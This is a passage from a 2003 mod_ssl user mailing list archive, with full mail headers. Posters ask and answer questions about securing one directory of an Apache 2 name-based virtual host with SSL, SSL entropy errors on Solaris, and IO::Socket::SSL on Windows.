	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2911.0)
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1106
Importance: Normal
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Beau E. Cox" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hi all -

I'm trying to use IO::Socket::SSL to secure TCP/IP
traffic for a client (no Apache/mod_ssl - just
a special purpose Perl client/server TCP/IP system).

No problems on Linux (SuSE 8.1),
Lots and lots and lots of problems in Windows (2K and
XP).

Is this a proper forum for asking for help, or
are my problems too 'perlish' for this list? Please
let me know if I'm off base; if so, I'll go over
to a perl list.

Aloha => Beau;

PS: Sorry 'bout Windows - but my client insists
on using it :)


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Feb 27 10:28:21 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id CA86D2AA054; Thu, 27 Feb 2003 10:28:21 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from maggotts.rnib.org.uk (maggotts.rnib.org.uk [194.128.16.48])
	by master.modssl.org (Postfix) with ESMTP id 1494E2AA036
	for ; Thu, 27 Feb 2003 10:28:20 +0100 (CET)
Received: from pboroweb.rnib.org.uk (pboroweb.rnib.org.uk [194.128.16.17])
	by maggotts.rnib.org.uk (8.11.6/8.11.6) with ESMTP id h1R9ZD101306
	for ; Thu, 27 Feb 2003 09:35:18 GMT
Received: by pboroweb.rnib.org.uk with Internet Mail Service (5.5.2650.21)
	id ; Thu, 27 Feb 2003 09:27:58 -0000
Message-ID: <9B66BBD37D5DD411B8CE00508B69700F033F274C@pborolocal.rnib.org.uk>
From: John.Airey@rnib.org.uk
To: modssl-users@modssl.org
Subject: RE: securing one area of a vhost in apache 2
Date: Thu, 27 Feb 2003 09:27:58 -0000
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2650.21)
Content-Type: text/plain;
	charset="iso-8859-1"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: John.Airey@rnib.org.uk
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

> -----Original Message-----
> From: Nick Tonkin [mailto:nick@tonkinresolutions.com]
> Sent: 27 February 2003 05:50
> To: modssl-users@modssl.org
> Subject: securing one area of a vhost in apache 2
> 
> 
> 
> Hello,
> 
> I am using Apache/2.0.44 (Unix) mod_perl/1.99_09-dev Perl/v5.8.0
> mod_ssl/2.0.44 OpenSSL/0.9.7
> 
> I have a virtual host which mostly is served without SSL. But 
> it has one
> area, /secure,  that needs to be secured with SSL. I've tried various
> combinations of directives but can't get it to work. Right now I have:
> 
> 
>     SSLEngine on
>     SSLProtocol all
>     SSLCipherSuite HIGH:MEDIUM
>     SSLCertificateFile /home/debug/www/_conf/certs/ladyraquel.crt
>     SSLCertificateKeyFile /home/debug/www/_conf/certs/ladyraquel.key
>     SSLCACertificateFile /home/debug/www/_conf/certs/ca.crt
>     SSLVerifyClient none
> 
>     
>         SSLVerifyClient require
>         SSLVerifyDepth 1
>     
> 
> 
> The server starts fine, serves non-SSL pages fine, but hangs when I
> request /secure.

I'm assuming that you are only interested in securing access, not in using
client certificates. Would that be correct?

In that case this will suffice:

 
     SSLEngine on
     SSLProtocol all
     SSLCipherSuite HIGH:MEDIUM
     SSLCertificateFile /home/debug/www/_conf/certs/ladyraquel.crt
     SSLCertificateKeyFile /home/debug/www/_conf/certs/ladyraquel.key
     
         SSLRequireSSL
     
 

See the SSLRequireSSL directive for more details. 

http://www.modssl.org/docs/2.8/ssl_reference.html#ToC22

- 
John Airey, BSc (Jt Hons), CNA, RHCE
Internet systems support officer, ITCSD, Royal National Institute of the
Blind,
Bakewell Road, Peterborough PE2 6XU,
Tel.: +44 (0) 1733 375299 Fax: +44 (0) 1733 370848 John.Airey@rnib.org.uk 

A world of difference - in the UK, 37 million people put their faith on the
last census as "Christian". In Saudi Arabia, this answer would carry a death
sentence for any Saudi.

- 

NOTICE: The information contained in this email and any attachments is 
confidential and may be legally privileged. If you are not the 
intended recipient you are hereby notified that you must not use, 
disclose, distribute, copy, print or rely on this email's content. If 
you are not the intended recipient, please notify the sender 
immediately and then delete the email and any attachments from your 
system.

RNIB has made strenuous efforts to ensure that emails and any 
attachments generated by its staff are free from viruses. However, it 
cannot accept any responsibility for any viruses which are 
transmitted. We therefore recommend you scan all attachments.

Please note that the statements and views expressed in this email 
and any attachments are those of the author and do not necessarily 
represent those of RNIB.

RNIB Registered Charity Number: 226227

Website: http://www.rnib.org.uk 
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Feb 27 15:34:58 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id F266C2AA036; Thu, 27 Feb 2003 15:34:57 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from darkstar.sysinfo.com (darkstar.sysinfo.com [209.170.144.33])
	by master.modssl.org (Postfix) with ESMTP id 0D1472AA015
	for ; Thu, 27 Feb 2003 15:34:55 +0100 (CET)
Received: from blackhole.sysinfo.com (dufresne@blackhole.sysinfo.com [209.170.142.145])
	by darkstar.sysinfo.com (8.9.1/8.9.1) with ESMTP id JAA15425;
	Thu, 27 Feb 2003 09:34:02 -0500
Date: Thu, 27 Feb 2003 09:34:00 -0500 (EST)
From: "R. DuFresne" 
To: Nick Tonkin 
Cc: modssl-users@modssl.org
Subject: Re: securing one area of a vhost in apache 2
In-Reply-To: <20030226214223.N54997@world.tonkinresolutions.com>
Message-ID: 
Organization: sysinfo.com
X-Subliminal: If at first you don't suck seed...
X-Admonition: The Good thing about potential is
X-Admonition2: as long as you do nothing
X-Admonition3: you'll always have it.
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "R. DuFresne" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users


You gave this site it's own IP address yes?

Virtual hosting with non-ssl works in a 'software' aware mode, while
virtual hosting with ssl is more 'hardware' in nature requireing specifici
IP addressing to function properly.

Thanks,

Ron DuFresne


On Wed, 26 Feb 2003, Nick Tonkin wrote:

> 
> Hello,
> 
> I am using Apache/2.0.44 (Unix) mod_perl/1.99_09-dev Perl/v5.8.0
> mod_ssl/2.0.44 OpenSSL/0.9.7
> 
> I have a virtual host which mostly is served without SSL. But it has one
> area, /secure,  that needs to be secured with SSL. I've tried various
> combinations of directives but can't get it to work. Right now I have:
> 
> 
>     SSLEngine on
>     SSLProtocol all
>     SSLCipherSuite HIGH:MEDIUM
>     SSLCertificateFile /home/debug/www/_conf/certs/ladyraquel.crt
>     SSLCertificateKeyFile /home/debug/www/_conf/certs/ladyraquel.key
>     SSLCACertificateFile /home/debug/www/_conf/certs/ca.crt
>     SSLVerifyClient none
> 
>     
>         SSLVerifyClient require
>         SSLVerifyDepth 1
>     
> 
> 
> The server starts fine, serves non-SSL pages fine, but hangs when I
> request /secure .
> 
> The error log has nothing, but the access log shows that the request went
> instead to the server's first virtual host, with a weird method of 'L'.
> 
> Any advice much appreciated.
> 
> - nick
> 
> 

-- 
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
        admin & senior security consultant:  sysinfo.com
                        http://sysinfo.com

"Cutting the space budget really restores my faith in humanity.  It
eliminates dreams, goals, and ideals and lets us get straight to the
business of hate, debauchery, and self-annihilation."
                -- Johnny Hart

testing, only testing, and damn good at it too!

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Feb 27 19:55:25 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 0DF592AA065; Thu, 27 Feb 2003 19:55:25 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: by master.modssl.org (Postfix, from userid 4000)
	id B9C842AA055; Thu, 27 Feb 2003 19:55:24 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Received: from ife.ee.ethz.ch (ife.ee.ethz.ch [129.132.29.2])
	by master.modssl.org (Postfix) with ESMTP id 20D592AA036
	for ; Thu, 27 Feb 2003 14:09:46 +0100 (CET)
Received: from sax.ee.ethz.ch (sax.ee.ethz.ch [129.132.29.7])
	by ife.ee.ethz.ch (8.12.5/8.12.5/IfE-server-10.2002) with ESMTP id h1RD9jjB016670
	for ; Thu, 27 Feb 2003 14:09:45 +0100 (MET)
Received: from localhost (zosh@localhost)
	by sax.ee.ethz.ch (8.12.5/8.12.5/IfE-nullclient-8.2002) with ESMTP id h1RD9ikM027435
	for ; Thu, 27 Feb 2003 14:09:45 +0100 (MET)
X-Authentication-Warning: sax.ee.ethz.ch: zosh owned process doing -bs
Date: Thu, 27 Feb 2003 14:09:44 +0100 (MET)
From: Beat Mueller 
To: modssl-users@modssl.org
Subject: Strange startup problem with Apache 2.0.44
Message-ID: 
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=ISO-8859-1
Content-Transfer-Encoding: QUOTED-PRINTABLE
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Beat Mueller 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Dear all,

first the properties of my box: Solaris 7 (hence no /dev/random) and gcc 3.=
0.1.
I compiled Apache 2.0.44 with the following options:

=2E/configure --prefix=3D/usr/local/apache-2.0.44-ssl --enable-info --enabl=
e-ssl \
--with-egd=3D/var/adm/entropy

My SSL is 0.9.7a, and /var/adm/entropy is a socket serviced by PRNG (I test=
ed it
with egc.pl and it delivers the desired data, but this is not the problem)

When I try to start the server error_log writes:
[Thu Feb 27 13:24:41 2003] [info] Init: Initializing OpenSSL library
[Thu Feb 27 13:24:41 2003] [info] Init: Seeding PRNG with 0 bytes of entrop=
y
[Thu Feb 27 13:24:41 2003] [warn] Init: PRNG still contains insufficient en=
tropy!
[Thu Feb 27 13:24:41 2003] [info] Init: Generating temporary RSA private ke=
ys (512/1024 bits)
[Thu Feb 27 13:24:41 2003] [error] Init: Failed to generate temporary 512 b=
it RSA private key
Configuration Failed

The relevant portions of my httpd.conf:

    Include conf/test-ssl.conf


And in test-ssl.conf:
SSLRandomSeed startup builtin
SSLRandomSeed startup egd:/var/adm/entropy 512
SSLRandomSeed connect builtin
SSLRandomSeed connect egd:/var/adm/entropy 512

The rest is more or less standard. Whatever I write into test-ssl.conf the =
error
message shown above comes again. Even if I comment out SSL in httpd.conf:
#
#    Include conf/test-ssl.conf
#

the same message appears. A truss on the process (with or without outcommen=
ted
mod_ssl.c) yields the same:

14566:  open("/dev/urandom", O_RDONLY|O_NONBLOCK|O_NOCTTY) Err#2 ENOENT
14566:  open("/dev/random", O_RDONLY|O_NONBLOCK|O_NOCTTY) Err#2 ENOENT
14566:  open("/dev/srandom", O_RDONLY|O_NONBLOCK|O_NOCTTY) Err#2 ENOENT

What is happening here? My Solaris box has none of these /dev/*random, but
why are they called when I a) specify /var/adm/entropy and b) even when
I don't want to start SSL at all?


Thank a lot in advance for your input,
Beat
--
Beat M=FCller
Institut f=FCr Elektronik
ETH Z=FCrich - Schweiz
beat.mueller@ife.ee.ethz.ch
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Feb 27 21:52:54 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id E77982AA054; Thu, 27 Feb 2003 21:52:53 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from world.tonkinresolutions.com (233-123.adsl6.netlojix.net [207.71.233.123])
	by master.modssl.org (Postfix) with ESMTP id 6D0572AA023
	for ; Thu, 27 Feb 2003 21:52:51 +0100 (CET)
Received: from world.tonkinresolutions.com (localhost.tonkinresolutions.com [127.0.0.1])
	by world.tonkinresolutions.com (8.12.7/8.12.6) with ESMTP id h1RKq7Vk056542;
	Thu, 27 Feb 2003 12:52:07 -0800 (PST)
	(envelope-from nick@tonkinresolutions.com)
Received: from localhost (nick@localhost)
	by world.tonkinresolutions.com (8.12.7/8.12.6/Submit) with ESMTP id h1RKq6Dh056539;
	Thu, 27 Feb 2003 12:52:07 -0800 (PST)
X-Authentication-Warning: world.tonkinresolutions.com: nick owned process doing -bs
Date: Thu, 27 Feb 2003 12:52:06 -0800 (PST)
From: Nick Tonkin 
To: modssl-users@modssl.org
Cc: John.Airey@rnib.org.uk
Subject: RE: securing one area of a vhost in apache 2
In-Reply-To: <9B66BBD37D5DD411B8CE00508B69700F033F274C@pborolocal.rnib.org.uk>
Message-ID: <20030227124228.G56452@world.tonkinresolutions.com>
References: <9B66BBD37D5DD411B8CE00508B69700F033F274C@pborolocal.rnib.org.uk>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Nick Tonkin 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

On Thu, 27 Feb 2003 John.Airey@rnib.org.uk wrote:

> > From: Nick Tonkin [mailto:nick@tonkinresolutions.com]
> >
> > I am using Apache/2.0.44 (Unix) mod_perl/1.99_09-dev Perl/v5.8.0
> > mod_ssl/2.0.44 OpenSSL/0.9.7
> >
> > I have a virtual host which mostly is served without SSL. But
> > it has one
> > area, /secure,  that needs to be secured with SSL. I've tried various
> > combinations of directives but can't get it to work. Right now I have:

[ snip ]

> I'm assuming that you are only interested in securing access, not in using
> client certificates. Would that be correct?

Yes. No authentication needed. Just want to make an SSL connection.

> In that case this will suffice:
>
>  
>      SSLEngine on
>      SSLProtocol all
>      SSLCipherSuite HIGH:MEDIUM
>      SSLCertificateFile /home/debug/www/_conf/certs/ladyraquel.crt
>      SSLCertificateKeyFile /home/debug/www/_conf/certs/ladyraquel.key
>      
>          SSLRequireSSL
>      
>  
>
> See the SSLRequireSSL directive for more details.

This didn't work, I am afraid:

nick@world ~>lwp-request -sSd http://www.ladyraquel.com:8080/weather
GET http://www.ladyraquel.com:8080/weather --> 301 Moved Permanently
GET https://ladyraquel.com:8080/weather/ --> 501 Protocol scheme 'https' is not supported
## it's rewriting the http scheme ...
## https not supported for resource outside the named dir seems sort of OK

nick@world ~>lwp-request -sSd http://www.ladyraquel.com:8080/weather/
GET http://www.ladyraquel.com:8080/weather/ --> 200 OK
## working fine

nick@world ~>lwp-request -sSd http://www.ladyraquel.com:8080/secure/
GET http://www.ladyraquel.com:8080/secure/ --> 403 Forbidden
## sort of what i expected with scheme of http://

nick@world ~>lwp-request -sSed https://www.ladyraquel.com:8080/secure/
GET https://www.ladyraquel.com:8080/secure/ --> 501 Protocol scheme 'https' is not supported
## huh?!

Any more advice gratefully accepted :)

- nick

-- 

~~~~~~~~~~~~~~~~~~~~
Nick Tonkin   {|8^)>

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Feb 27 21:54:51 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id CE9AE2AA055; Thu, 27 Feb 2003 21:54:51 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from world.tonkinresolutions.com (233-123.adsl6.netlojix.net [207.71.233.123])
	by master.modssl.org (Postfix) with ESMTP id A07D22AA023
	for ; Thu, 27 Feb 2003 21:54:50 +0100 (CET)
Received: from world.tonkinresolutions.com (localhost.tonkinresolutions.com [127.0.0.1])
	by world.tonkinresolutions.com (8.12.7/8.12.6) with ESMTP id h1RKs5Vk056553;
	Thu, 27 Feb 2003 12:54:05 -0800 (PST)
	(envelope-from nick@tonkinresolutions.com)
Received: from localhost (nick@localhost)
	by world.tonkinresolutions.com (8.12.7/8.12.6/Submit) with ESMTP id h1RKs5V0056550;
	Thu, 27 Feb 2003 12:54:05 -0800 (PST)
X-Authentication-Warning: world.tonkinresolutions.com: nick owned process doing -bs
Date: Thu, 27 Feb 2003 12:54:05 -0800 (PST)
From: Nick Tonkin 
To: modssl-users@modssl.org
Cc: steve@ducksfeet.com
Subject: RE: securing one area of a vhost in apache 2
In-Reply-To: 
Message-ID: <20030227125217.N56452@world.tonkinresolutions.com>
References: 
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Nick Tonkin 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

On Wed, 26 Feb 2003, Steven Resnick wrote:

> The technique I have seen for this is to simply serve the entire site using
> SSL and link only to the areas you want as secure.

But that sort of defeats the whole porpoise! I want users to be able to
browse the site and then when they enter a certain area, the connection
should swicth to SSL-encrypted via https. Are you saying that this cannot
be done with a separate virtual host?

- nick

-- 

~~~~~~~~~~~~~~~~~~~~
Nick Tonkin   {|8^)>

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Feb 27 21:58:16 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 5E3BF2AA054; Thu, 27 Feb 2003 21:58:16 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from toftum.dk (toftum.dk [193.88.12.46])
	by master.modssl.org (Postfix) with ESMTP id 2AED02AA023
	for ; Thu, 27 Feb 2003 21:58:11 +0100 (CET)
Received: by toftum.dk (Postfix, from userid 1001)
	id 238406E4019; Thu, 27 Feb 2003 21:58:06 +0100 (CET)
Date: Thu, 27 Feb 2003 21:58:06 +0100
From: Mads Toftum 
To: modssl-users@modssl.org
Subject: Re: securing one area of a vhost in apache 2
Message-ID: <20030227205805.GC26998@toftum.dk>
Mail-Followup-To: modssl-users@modssl.org
References: <9B66BBD37D5DD411B8CE00508B69700F033F274C@pborolocal.rnib.org.uk> <20030227124228.G56452@world.tonkinresolutions.com>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To: <20030227124228.G56452@world.tonkinresolutions.com>
X-Mailer: mutt
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Mads Toftum 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

On Thu, Feb 27, 2003 at 12:52:06PM -0800, Nick Tonkin wrote:
> nick@world ~>lwp-request -sSed https://www.ladyraquel.com:8080/secure/
> GET https://www.ladyraquel.com:8080/secure/ --> 501 Protocol scheme 'https' is not supported
> ## huh?!
> 
> Any more advice gratefully accepted :)
> 
This looks very much like a client error from lwp. You need
Crypt::SSLeay for that, see:
http://search.cpan.org/author/CHAMAS/Crypt-SSLeay-0.49/

vh

Mads Toftum
-- 
`Darn it, who spiked my coffee with water?!' - lwall

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Feb 27 21:58:40 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id BBCA92AA055; Thu, 27 Feb 2003 21:58:40 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from world.tonkinresolutions.com (233-123.adsl6.netlojix.net [207.71.233.123])
	by master.modssl.org (Postfix) with ESMTP id 258592AA053
	for ; Thu, 27 Feb 2003 21:58:39 +0100 (CET)
Received: from world.tonkinresolutions.com (localhost.tonkinresolutions.com [127.0.0.1])
	by world.tonkinresolutions.com (8.12.7/8.12.6) with ESMTP id h1RKvtVk056565;
	Thu, 27 Feb 2003 12:57:55 -0800 (PST)
	(envelope-from nick@tonkinresolutions.com)
Received: from localhost (nick@localhost)
	by world.tonkinresolutions.com (8.12.7/8.12.6/Submit) with ESMTP id h1RKvtWm056562;
	Thu, 27 Feb 2003 12:57:55 -0800 (PST)
X-Authentication-Warning: world.tonkinresolutions.com: nick owned process doing -bs
Date: Thu, 27 Feb 2003 12:57:55 -0800 (PST)
From: Nick Tonkin 
To: "R. DuFresne" 
Cc: modssl-users@modssl.org
Subject: Re: securing one area of a vhost in apache 2
In-Reply-To: 
Message-ID: <20030227125411.C56452@world.tonkinresolutions.com>
References: 
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Nick Tonkin 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

On Thu, 27 Feb 2003, R. DuFresne wrote:

>
> You gave this site it's own IP address yes?

No. It is using NameVirtualHost.

>
> Virtual hosting with non-ssl works in a 'software' aware mode, while
> virtual hosting with ssl is more 'hardware' in nature requireing specifici
> IP addressing to function properly.


Hmm. I must have missed this in the docos. Rechecking ...

Hm. Well, I see that I was on the wrong track with "How can I authenticate
my clients for a particular URL based on certificates but still allow
arbitrary clients to access the remaining parts of the server?" ... that
appears on closer inspection to deal with certificate-wielding clients ...

Hm.

So, bottom line, it is not possible to have a virtual host accessible via
http and require SSL for a part of it. Is that correct?

Thanks,

- nick

-- 

~~~~~~~~~~~~~~~~~~~~
Nick Tonkin   {|8^)>

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Feb 27 22:02:06 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id BF4592AA055; Thu, 27 Feb 2003 22:02:06 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from world.tonkinresolutions.com (233-123.adsl6.netlojix.net [207.71.233.123])
	by master.modssl.org (Postfix) with ESMTP id B57212AA023
	for ; Thu, 27 Feb 2003 22:02:04 +0100 (CET)
Received: from world.tonkinresolutions.com (localhost.tonkinresolutions.com [127.0.0.1])
	by world.tonkinresolutions.com (8.12.7/8.12.6) with ESMTP id h1RL1LVk056583;
	Thu, 27 Feb 2003 13:01:21 -0800 (PST)
	(envelope-from nick@tonkinresolutions.com)
Received: from localhost (nick@localhost)
	by world.tonkinresolutions.com (8.12.7/8.12.6/Submit) with ESMTP id h1RL1LAY056580;
	Thu, 27 Feb 2003 13:01:21 -0800 (PST)
X-Authentication-Warning: world.tonkinresolutions.com: nick owned process doing -bs
Date: Thu, 27 Feb 2003 13:01:21 -0800 (PST)
From: Nick Tonkin 
To: modssl-users@modssl.org
Cc: mads@toftum.dk
Subject: Re: securing one area of a vhost in apache 2
In-Reply-To: <20030227205805.GC26998@toftum.dk>
Message-ID: <20030227130045.I56452@world.tonkinresolutions.com>
References: <9B66BBD37D5DD411B8CE00508B69700F033F274C@pborolocal.rnib.org.uk>
 <20030227124228.G56452@world.tonkinresolutions.com> <20030227205805.GC26998@toftum.dk>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Nick Tonkin 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

On Thu, 27 Feb 2003, Mads Toftum wrote:

> On Thu, Feb 27, 2003 at 12:52:06PM -0800, Nick Tonkin wrote:
> > nick@world ~>lwp-request -sSed https://www.ladyraquel.com:8080/secure/
> > GET https://www.ladyraquel.com:8080/secure/ --> 501 Protocol scheme 'https' is not supported
> > ## huh?!

> This looks very much like a client error from lwp. You need
> Crypt::SSLeay for that, see:
> http://search.cpan.org/author/CHAMAS/Crypt-SSLeay-0.49/

I'm sorry, for what? For requesting https?

- nick

-- 

~~~~~~~~~~~~~~~~~~~~
Nick Tonkin   {|8^)>

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Feb 27 22:16:47 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 2C0822AA054; Thu, 27 Feb 2003 22:16:47 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mta01-srv.alltel.net (mta01.alltel.net [166.102.165.143])
	by master.modssl.org (Postfix) with ESMTP id 12FA42AA024
	for ; Thu, 27 Feb 2003 22:16:45 +0100 (CET)
Received: from woodware1 ([162.40.202.246]) by mta01-srv.alltel.net
          with SMTP
          id <20030227211633.YXYO17624.mta01-srv.alltel.net@woodware1>;
          Thu, 27 Feb 2003 15:16:33 -0600
Message-ID: <2f5101c2dea5$8035ba10$0300000a@abraxis.com>
From: "Don Woodward" 
To: , "R. DuFresne" 
References:  <20030227125411.C56452@world.tonkinresolutions.com>
Subject: Re: securing one area of a vhost in apache 2
Date: Thu, 27 Feb 2003 16:16:31 -0500
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2800.1106
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1106
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Don Woodward" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Take a look at the "RedirectMatch" configuration directive. You should be
able to do something like

RedirectMatch http://www.mysite.com/secure/*
https://www.mysite.com/secure/secureindex.htm

73's

Don Woodward

----- Original Message -----
From: "Nick Tonkin" 
To: "R. DuFresne" 
Cc: 
Sent: Thursday, February 27, 2003 15:57
Subject: Re: securing one area of a vhost in apache 2


> On Thu, 27 Feb 2003, R. DuFresne wrote:
>
> >
> > You gave this site it's own IP address yes?
>
> No. It is using NameVirtualHost.
>
> >
> > Virtual hosting with non-ssl works in a 'software' aware mode, while
> > virtual hosting with ssl is more 'hardware' in nature requireing
specifici
> > IP addressing to function properly.
>
>
> Hmm. I must have missed this in the docos. Rechecking ...
>
> Hm. Well, I see that I was on the wrong track with "How can I
authenticate
> my clients for a particular URL based on certificates but still allow
> arbitrary clients to access the remaining parts of the server?" ... that
> appears on closer inspection to deal with certificate-wielding clients
...
>
> Hm.
>
> So, bottom line, it is not possible to have a virtual host accessible via
> http and require SSL for a part of it. Is that correct?
>
> Thanks,
>
> - nick
>
> --
>
> ~~~~~~~~~~~~~~~~~~~~
> Nick Tonkin   {|8^)>
>
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
>

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Feb 27 22:21:25 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 54CB82AA055; Thu, 27 Feb 2003 22:21:25 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from darkstar.sysinfo.com (darkstar.sysinfo.com [209.170.144.33])
	by master.modssl.org (Postfix) with ESMTP id 40BAB2AA024
	for ; Thu, 27 Feb 2003 22:21:18 +0100 (CET)
Received: from blackhole.sysinfo.com (dufresne@blackhole.sysinfo.com [209.170.142.145])
	by darkstar.sysinfo.com (8.9.1/8.9.1) with ESMTP id QAA04493;
	Thu, 27 Feb 2003 16:19:19 -0500
Date: Thu, 27 Feb 2003 16:19:19 -0500 (EST)
From: "R. DuFresne" 
To: Nick Tonkin 
Cc: modssl-users@modssl.org
Subject: Re: securing one area of a vhost in apache 2
In-Reply-To: <20030227125411.C56452@world.tonkinresolutions.com>
Message-ID: 
Organization: sysinfo.com
X-Subliminal: If at first you don't suck seed...
X-Admonition: The Good thing about potential is
X-Admonition2: as long as you do nothing
X-Admonition3: you'll always have it.
MIME-Version: 1.0
